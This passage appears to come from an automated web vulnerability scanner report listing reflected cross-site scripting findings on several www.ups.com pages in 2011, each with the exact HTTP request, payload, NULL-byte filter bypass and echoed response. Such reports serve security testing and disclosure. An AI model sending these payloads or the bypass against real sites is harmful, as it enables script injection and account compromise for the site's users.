<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
a06e554b0?appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/cvae6b82';f7a06e554b0?appid=CVA';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/cvae6b82';f7a06e554b0?appid=CVA';
actionUrl = "/one-to-one/login?ID=100
...[SNIP]...

1.133. https://www.ups.com/cva [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /cva

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 940e5"%20a%3db%2097335661a92 was submitted in the REST URL parameter 1. This input was echoed as 940e5" a=b 97335661a92 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cva940e5"%20a%3db%2097335661a92 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:29 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44421


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/cva940e5" a=b 97335661a92?appid=CVA">
...[SNIP]...

1.134. https://www.ups.com/cva [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /cva

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0094092'-alert(1)-'0ff48cd0011 was submitted in the loc parameter. This input was echoed as 94092'-alert(1)-'0ff48cd0011 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /cva?loc=en_US%0094092'-alert(1)-'0ff48cd0011&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:14 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14513


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
d0011&appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_94092'-alert(1)-'0ff48cd0011&appid=CVA';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_94092'-alert(1)-'0ff48cd0011&appid=CVA';
actionUrl = "/one-to-on
...[SNIP]...

1.135. https://www.ups.com/cva [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /cva

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %001aca2</script><script>alert(1)</script>0fa99372be7 was submitted in the loc parameter. This input was echoed as 1aca2</script><script>alert(1)</script>0fa99372be7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /cva?loc=en_US%001aca2</script><script>alert(1)</script>0fa99372be7&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:20 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15339


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_1aca2</script><script>alert(1)</script>0fa99372be7&appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_1aca2
...[SNIP]...

1.136. https://www.ups.com/cva [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /cva

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00cd6da"><script>alert(1)</script>ed89f360e04 was submitted in the loc parameter. This input was echoed as cd6da"><script>alert(1)</script>ed89f360e04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /cva?loc=en_US%00cd6da"><script>alert(1)</script>ed89f360e04&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:11 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15218


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_cd6da"><script>alert(1)</script>ed89f360e04&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_cd6da%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Bed89f360e04%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.137. https://www.ups.com/myWorkspace/home [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /myWorkspace/home

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aed41"%20a%3db%20e2142496064 was submitted in the REST URL parameter 2. This input was echoed as aed41" a=b e2142496064 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myWorkspace/homeaed41"%20a%3db%20e2142496064 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44485


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/myWorkspace/homeaed41" a=b e2142496064">
...[SNIP]...

1.138. https://www.ups.com/myWorkspace/home [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /myWorkspace/home

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload dd611%0a13f21f4da2b was submitted in the REST URL parameter 2. This input was echoed as dd611
13f21f4da2b
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /myWorkspace/homedd611%0a13f21f4da2b HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:34 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44384


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/myWorkspace/homedd611
13f21f4da2b
';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/myWorkspace/homedd611

...[SNIP]...

1.139. https://www.ups.com/myWorkspace/home [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /myWorkspace/home

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9f22'%3b5a005591ca8 was submitted in the REST URL parameter 2. This input was echoed as d9f22';5a005591ca8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /myWorkspace/homed9f22'%3b5a005591ca8 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44401


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
591ca8';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/myWorkspace/homed9f22';5a005591ca8';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/myWorkspace/homed9f22';5a005591ca8';
actionUrl = "/one-to-one/login?ID=100&loc="
...[SNIP]...

1.140. https://www.ups.com/myWorkspace/home [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myWorkspace/home

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %003b705'-alert(1)-'675be0e7959 was submitted in the loc parameter. This input was echoed as 3b705'-alert(1)-'675be0e7959 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /myWorkspace/home?loc=en_US%003b705'-alert(1)-'675be0e7959&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14391


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
1)-'675be0e7959';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_3b705'-alert(1)-'675be0e7959';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_3b705'-alert(1)-'675be0e7959';
actionUrl = "/one-to-one/login?ID=100&loc="
...[SNIP]...

1.141. https://www.ups.com/myWorkspace/home [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myWorkspace/home

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %007d10a</script><script>alert(1)</script>21c1fea2813 was submitted in the loc parameter. This input was echoed as 7d10a</script><script>alert(1)</script>21c1fea2813 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /myWorkspace/home?loc=en_US%007d10a</script><script>alert(1)</script>21c1fea2813&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15217


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_7d10a</script><script>alert(1)</script>21c1fea2813';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_7d10a</script>
...[SNIP]...

1.142. https://www.ups.com/myWorkspace/home [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myWorkspace/home

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004df24"><script>alert(1)</script>e2b70b6725a was submitted in the loc parameter. This input was echoed as 4df24"><script>alert(1)</script>e2b70b6725a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /myWorkspace/home?loc=en_US%004df24"><script>alert(1)</script>e2b70b6725a&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:09 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15096


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_4df24"><script>alert(1)</script>e2b70b6725a&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_4df24%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Be2b70b6725a%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.143. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /myWorkspace/wspref

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 482d2"%20a%3db%2082ed3444b68 was submitted in the REST URL parameter 2. This input was echoed as 482d2" a=b 82ed3444b68 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myWorkspace/wspref482d2"%20a%3db%2082ed3444b68 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44507


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/myWorkspace/wspref482d2" a=b 82ed3444b68">
...[SNIP]...

1.144. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /myWorkspace/wspref

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 82b5e%0a3c917cf9f81 was submitted in the REST URL parameter 2. This input was echoed as 82b5e
3c917cf9f81
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /myWorkspace/wspref82b5e%0a3c917cf9f81 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44406


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
eForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/myWorkspace/wspref82b5e
3c917cf9f81
';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/myWorkspace/wspref82b5
...[SNIP]...

1.145. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /myWorkspace/wspref

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload faefa'%3b3a06bbe69ac was submitted in the REST URL parameter 2. This input was echoed as faefa';3a06bbe69ac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /myWorkspace/wspreffaefa'%3b3a06bbe69ac HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:29 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44423


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
69ac';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/myWorkspace/wspreffaefa';3a06bbe69ac';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/myWorkspace/wspreffaefa';3a06bbe69ac';
actionUrl = "/one-to-one/login?ID=100&loc=
...[SNIP]...

1.146. https://www.ups.com/myWorkspace/wspref [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myWorkspace/wspref

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0010244'-alert(1)-'35d1037df28 was submitted in the loc parameter. This input was echoed as 10244'-alert(1)-'35d1037df28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

